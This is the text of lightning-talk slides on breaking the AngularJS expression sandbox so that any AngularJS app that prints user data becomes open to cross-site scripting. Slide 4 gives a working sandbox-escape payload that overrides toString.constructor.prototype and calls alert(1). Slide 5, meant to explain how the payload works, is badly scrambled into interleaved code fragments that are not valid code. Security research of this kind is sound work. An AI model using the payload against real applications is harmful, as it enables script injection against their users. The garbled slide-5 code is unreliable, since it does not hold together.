Lightning talk by avlidienburnn on how to break AngularJS sandbox and more or less XSS every AngularJS app out there (slight e

1. Breaking ngularJS
Javascript sandbox
A lightning talk by avlidienbrunn

2. What is AngularJS? And
where’s the sandbox?
• Javascript framework for building single page web
applications.
• Mustache style templates: Having <h1>{{1+2+3}}</h1>
anywhere in Angular HTML app will render <h1>6</h1>
• Template expressions are evaluated with Javascript
• Template expression Javascript is sandboxed - It can’t
reach [object Window] or DOM
• If we could access dangerous objects from templates, we
could XSS any AngularJS app that prints user data in
Angular bound HTML

3. Executing JS… From JS
• eval() - Unavailable under window
• document.write - Unavailable under document
• location=“javascript:” - Unavailable under
document
• Function(“code”)() - Unavailable under blacklist
• What else is there?

4. The bypass
toString.constructor.prototype.toString=
toString.constructor.prototype.call;
[“a”,"alert(1)"].sort(toString.constructor)
alert(1)

5. The how
if(if((toString.Function("compareFunction(function(constructor.a){a", alert("alert(1)}) 1)}).element1, 1)") prototype.== toString() == 1){
1){
element2) toString=
== 1..toString()){
== 1){
toString.//{{sort toString.element constructor.constructor.as bigger
prototype.prototype.call;
toString=
}else if((function(["if(… a","toString.alert(== a){0){
1)"].alert(constructor.sort(1)}).Function);
call() prototype.== 1..toString()){
call;
//sort element as same
}else{
//sort element as smaller
}
//sort element as bigger
}else if(… == 0){
//sort element as same
}else{
//sort element as smaller
}
toString.constructor);
[“a”,”alert(1)”].sort(toString.constructor)}}
alert(1)

6. That’s all folks!
+ =
A lightning talk by avlidienbrunn